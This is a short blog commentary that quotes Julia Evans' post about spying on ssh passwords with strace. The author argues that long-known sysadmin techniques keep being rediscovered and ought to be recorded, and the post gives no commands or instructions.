Spying on ssh with strace by Julia Evans.
From the post:
In the shower this morning I was thinking about strace and ltrace and how they let you inspect the system calls a running process is making. I’ve played a bit with strace on this blog before (see Understanding how killall works using strace), but it’s clear to me that there are tons of uses for it I haven’t explored yet.
Then I thought “Hey! If you can look at the system calls with strace and the library calls with ltrace, can you spy on people’s ssh passwords?!”
It turns out that you can! I was going to do original research, but as with most things one thinks up in the shower, it turns out someone’s already done this before. So I googled it and I found this blog post explaining how to spy on ssh. The instructions here are just taken from there 🙂
…
Julia re-discovered that ssh is vulnerable to strace.
Good for Julia but shouldn’t it be unnecessary for Julia to “re-discover” this usage of strace?
That is to add to the general body of knowledge about strace, a new or innovative use of strace would be more useful.
Not to take anything away from Julia’s realizing the application of strace to ssh, probably the better way to learn but progress can be slowed by re-learning old lessons time and time again.
The man page on strace reports the release of strace 2.5 in 1992, so this isn’t a recent command.
Capturing the long legacy of sysadmin knowledge would pay off for maintenance of older systems and perhaps avoiding mistakes in the design of new systems.
BTW, I found a map today that may help you find interesting places to explore in the Linux kernel. More on that in a minute.